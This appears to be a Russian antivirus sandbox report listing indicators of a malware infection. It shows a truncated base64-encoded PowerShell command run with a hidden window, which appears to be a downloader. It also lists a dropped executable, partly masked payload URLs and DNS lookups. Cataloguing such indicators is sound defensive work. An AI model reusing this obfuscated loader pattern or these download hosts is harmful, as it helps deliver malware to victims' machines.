Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGUAYQBkAHYAZQBhAGYAbABhAGUAcwBtAG8AbwBtAD0AJwBsAGEAbwBiACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQBgAFIASQBUAGAAeQBQAFIAbwB0AE8AYABDAE...
- %HOMEPATH%\411.exe
- %HOMEPATH%\411.exe
- http://kh###.cd.gov.mn/cgi-bin/G/
- http://www.cp##olf.cn/team/7oRM8Z/
- DNS ASK kh###.cd.gov.mn
- DNS ASK cp##olf.cn
- DNS ASK sm####wschannel.com
- DNS ASK hi###ewomen.com
- DNS ASK pr####oloevent.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGUAYQBkAHYAZQBhAGYAbABhAGUAcwBtAG8AbwBtAD0AJwBsAGEAbwBiACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQBgAFIASQBUAGAAeQBQAFIAbwB0AE8AYABDAE...' (со скрытым окном)